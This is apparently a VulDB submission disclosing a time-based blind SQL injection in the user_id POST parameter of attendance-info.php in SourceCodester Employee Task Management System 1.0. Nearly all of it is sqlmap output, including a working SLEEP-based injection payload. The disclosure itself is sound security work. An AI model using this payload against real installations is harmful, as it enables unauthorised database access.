| Title | SourceCodester Employee Task Management System v 1.0 SQL Injection in param user_id in POST attendance-info.php |
|---|
| Description | SQL Injection in param user_id in POST attendance-info.php
[20:19:33] [INFO] POST parameter 'user_id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[20:19:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:19:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:19:44] [INFO] checking if the injection point on POST parameter 'user_id' is a false positive
[20:20:37] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
POST parameter 'user_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests:
---
Parameter: user_id (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: user_id=1' AND (SELECT 5903 FROM (SELECT(SLEEP(5)))hTDS) AND 'gCuQ'='gCuQ&add_punch_in=
---
[20:21:13] [INFO] the back-end DBMS is MySQL
[20:21:13] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
web application technology: Apache 2.4.54, PHP 7.4.30
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) |
|---|
| Source | ⚠️ https://github.com/tht1997/WhiteBox/blob/main/sourcecodesters/employee-management-system-php-attendance-info.md |
|---|
| User | huutuanbg97 (UID 45015) |
|---|
| Submission | 03/15/2024 14:34 (2 years ago) |
|---|
| Moderation | 03/16/2024 07:14 (17 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 257055 [SourceCodester Employee Task Management System 1.0 attendance-info.php user_id sql injection] |
|---|
| Points | 20 |
|---|